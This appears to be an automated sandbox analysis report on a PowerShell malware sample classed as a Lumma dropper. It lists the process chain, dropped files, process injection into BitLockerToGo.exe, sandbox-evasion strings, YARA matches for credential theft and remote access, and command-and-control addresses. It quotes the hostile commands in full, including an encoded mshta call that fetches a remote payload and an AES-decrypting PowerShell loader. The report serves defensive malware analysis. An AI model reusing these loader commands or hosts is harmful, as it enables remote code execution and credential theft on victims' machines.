              Source: Binary string: dialer.pdb source: mshta.exe, 00000003.00000002.2371336752.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BE02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362755173.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2361886828.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366555321.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362119831.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362034445.0000023769CC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359272014.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, smart1[1].3.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll.5.dr

              Data Obfuscation

              Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('[hex-encoded ciphertext omitted]');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)
              Source: smart1[1].3.dr Static PE information: 0xC5AA0E47 [Fri Feb 1 14:18:47 2075 UTC]
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 11_2_0306BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_0306BA2C
              Source: smart1[1].3.dr Static PE information: real checksum: 0x12283 should be: 0x2b4c9
              Source: 0SmartAssem.exe.5.dr Static PE information: section name: .xdata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 11_2_0306A9F5 push ecx; ret 11_2_0306AA08
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxSharedFolders.dll
              Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxVMM.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Qt5SqlVBox.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\0SmartAssem.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxSupLib.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2459Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1012Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1440Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 579Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5793Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3974Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxSharedFolders.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]Jump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxVMM.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Qt5SqlVBox.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxSupLib.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520Thread sleep count: 1440 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep count: 579 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7284Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03051160 GetSystemInfo,11_2_03051160
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: VBoxVMM.dll.5.drBinary or memory string: X2APICPAGE::id.u32ApicIdX2APICPAGE::version.all.u32VersionX2APICPAGE::tpr.u8TprX2APICPAGE::ppr.u8PprX2APICPAGE::ldr.u32LogicalApicIdX2APICPAGE::svr.all.u32SvrX2APICPAGE::isr.u[0].u32RegX2APICPAGE::isr.u[1].u32RegX2APICPAGE::isr.u[2].u32RegX2APICPAGE::isr.u[3].u32RegX2APICPAGE::isr.u[4].u32RegX2APICPAGE::isr.u[5].u32RegX2APICPAGE::isr.u[6].u32RegX2APICPAGE::isr.u[7].u32RegX2APICPAGE::tmr.u[0].u32RegX2APICPAGE::tmr.u[1].u32RegX2APICPAGE::tmr.u[2].u32RegX2APICPAGE::tmr.u[3].u32RegX2APICPAGE::tmr.u[4].u32RegX2APICPAGE::tmr.u[5].u32RegX2APICPAGE::tmr.u[6].u32RegX2APICPAGE::tmr.u[7].u32RegX2APICPAGE::irr.u[0].u32RegX2APICPAGE::irr.u[1].u32RegX2APICPAGE::irr.u[2].u32RegX2APICPAGE::irr.u[3].u32RegX2APICPAGE::irr.u[4].u32RegX2APICPAGE::irr.u[5].u32RegX2APICPAGE::irr.u[6].u32RegX2APICPAGE::irr.u[7].u32RegX2APICPAGE::esr.all.u32ErrorsX2APICPAGE::icr_lo.all.u32IcrLoX2APICPAGE::icr_hi.u32IcrHiX2APICPAGE::lvt_timer.all.u32LvtTimerX2APICPAGE::lvt_thermal.all.u32LvtThermalX2APICPAGE::lvt_perf.all.u32LvtPerfX2APICPAGE::lvt_lint0.all.u32LvtLint0X2APICPAGE::lvt_lint1.all.u32LvtLint1X2APICPAGE::lvt_error.all.u32LvtErrorX2APICPAGE::timer_icr.u32InitialCountX2APICPAGE::timer_ccr.u32CurrentCountX2APICPAGE::timer_dcr.all.u32DivideValueAPIC: Enabling Hyper-V x2APIC compatibility mode
              Source: VBoxVMM.dll.5.drBinary or memory string: APIC: Enabling Hyper-V x2APIC compatibility mode
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareEs
              Source: svchost.exe, 00000004.00000002.2964949813.00000209D2E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2964983054.00000209D2E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2966675711.00000209D8659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: mshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPs
              Source: 0SmartAssem.exe, 00000008.00000002.1998926914.0000022BCA468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0306A718
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03054610 VirtualProtect ?,00000004,00000100,0000000011_2_03054610
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_0306BA2C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03069160 mov eax, dword ptr fs:[00000030h]11_2_03069160
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03054610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,11_2_03054610
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306C8D9 SetUnhandledExceptionFilter,11_2_0306C8D9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0306ACFA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara matchFile source: Process Memory Space: 0SmartAssem.exe PID: 7716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7916, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded mshta "https://bidvertiser.b-cdn.net/smart1"
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E35008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnx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jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\0SmartAssem.exe "C:\Users\user\AppData\Roaming\0SmartAssem.exe"
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function hbahmnxa($zzzovm){return -split ($zzzovm -replace '..', '0x$& ')};$pecdkn = hbahmnxa('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');$jqkxh = [system.security.cryptography.aes]::create();$jqkxh.key = hbahmnxa('52615577706262664d6d43476f4f4344');$jqkxh.iv = new-object byte[] 16;$spkoqcak = $jqkxh.createdecryptor();$cwklkdgxo = $spkoqcak.transformfinalblock($pecdkn, 0, $pecdkn.length);$mtmnxpoaf = [system.text.encoding]::utf8.getstring($cwklkdgxo);$spkoqcak.dispose();& $mtmnxpoaf.substring(0,3) $mtmnxpoaf.substring(3)
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe Queries volume information: C:\Users\user\AppData\Roaming\0SmartAssem.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 11_2_030672F0 GetUserNameA,11_2_030672F0

              Stealing of Sensitive Information

              Source: Yara match, File source: 8.2.0SmartAssem.exe.7ff74ca60000.8.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 8.0.0SmartAssem.exe.7ff74ca60000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara match, File source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: 0SmartAssem.exe PID: 7716, type: MEMORYSTR
              Source: Yara match, File source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, type: DROPPED
              Source: Yara match, File source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: BitLockerToGo.exe PID: 7916, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match, File source: 8.2.0SmartAssem.exe.7ff74ca60000.8.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 8.0.0SmartAssem.exe.7ff74ca60000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara match, File source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: 0SmartAssem.exe PID: 7716, type: MEMORYSTR
              Source: Yara match, File source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, type: DROPPED
              Source: Yara match, File source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: BitLockerToGo.exe PID: 7916, type: MEMORYSTR
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 112 Command and Scripting Interpreter | 1 DLL Side-Loading | 311 Process Injection | 21 Masquerading | OS Credential Dumping | 131 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 23 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
              [Behavior graph: ID 1491044; Sample: verification.b-cdn.net.ps1; Startdate: 10/08/2024; Architecture: WINDOWS; Score: 100. Process chain: powershell.exe, powershell.exe, mshta.exe (contacts bidvertiser.b-cdn.net, 185.93.1.250, port 443), powershell.exe, 0SmartAssem.exe, BitLockerToGo.exe (contacts 193.176.153.234, port 80).]

              | Source | Detection | Scanner | Label | Link |
              | --- | --- | --- | --- | --- |
              | verification.b-cdn.net.ps1 | 0% | ReversingLabs | | |
              | verification.b-cdn.net.ps1 | 2% | Virustotal | | Browse |

              | Source | Detection | Scanner | Label | Link |
              | --- | --- | --- | --- | --- |
              | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1] | 39% | ReversingLabs | Win32.Dropper.Lumma | |
              | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1] | 28% | Virustotal | | Browse |
              | C:\Users\user\AppData\Roaming\0SmartAssem.exe | 18% | ReversingLabs | Win64.Malware.Generic | |
              | C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Roaming\Qt5SqlVBox.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Roaming\VBoxSharedFolders.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Roaming\VBoxSupLib.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Roaming\VBoxVMM.dll | 0% | ReversingLabs | | |
              No Antivirus matches
              No Antivirus matches
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              bidvertiser.b-cdn.net | 185.93.1.250 | true | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://193.176.153.234/587ec30955d49a9c.php | true | Virustotal: 0%; Avira URL Cloud: safe | unknown
                https://bidvertiser.b-cdn.net/smart1.zip | false | Virustotal: 3%; Avira URL Cloud: malware | unknown
                https://bidvertiser.b-cdn.net/smart1 | true | Virustotal: 3%; Avira URL Cloud: malware | unknown
                http://193.176.153.234/ | true | Virustotal: 2%; Avira URL Cloud: safe | unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://bidvertiser.b-cdn.net/Fmshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1Hmshta.exe, 00000003.00000002.2369149756.0000022F67060000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1.zipppowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.netpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmptrue
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://193.176.153.234/:BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1C:mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369176557.0000022F67070000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://193.176.153.234/587ec30955d49a9c.phpDBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1Dmshta.exe, 00000003.00000002.2369176557.0000022F67077000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1I9mshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.ver)svchost.exe, 00000004.00000002.2966543724.00000209D8600000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://g.live.com/odclientsettings/ProdV2.C:edb.log.4.drfalse
                • URL Reputation: safe
                unknown
                https://aka.ms/pscore6powershell.exe, 00000000.00000002.1728419864.000001E7E1683000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1...r#mshta.exe, 00000003.00000003.2366620634.0000023769CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2370751127.0000023769CA5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://bidvertiser.b-cdn.net/smart1_BROWSER_APP_Bmshta.exe, 00000003.00000002.2369835096.0000022F67400000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
